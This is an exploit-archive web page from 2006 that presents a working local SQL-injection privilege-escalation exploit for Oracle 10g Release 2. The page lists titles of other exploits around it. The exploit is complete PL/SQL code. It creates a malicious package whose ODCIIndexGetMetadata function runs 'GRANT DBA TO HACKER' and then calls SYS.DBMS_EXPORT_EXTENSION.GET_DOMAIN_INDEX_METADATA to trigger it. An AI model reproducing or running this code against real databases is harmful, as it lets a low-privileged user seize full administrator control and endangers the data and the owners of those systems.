exploits , vulnerabilities , articles , Oracle <= 10g Release 2 (DBMS_EXPORT

2007-04-02 Oracle 10g DBMS_AQ.ENQUEUE SQL Injection Exploit
2007-03-27 Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit v2
2007-03-27 Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit v2
2007-03-10 Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)
2006-01-26 Oracle Database Server 9i/10g XML Database Component Buffer Overflow Exploit

2006-04-26

Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit

Rated as : High Risk

/* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
securitydot.net - 2006-04-26

Exploits - newest 10 RSS | More

2007-06-15 56696 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33811 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41926 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29021 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19510 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16492 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19157 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16355 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33287 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17017 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit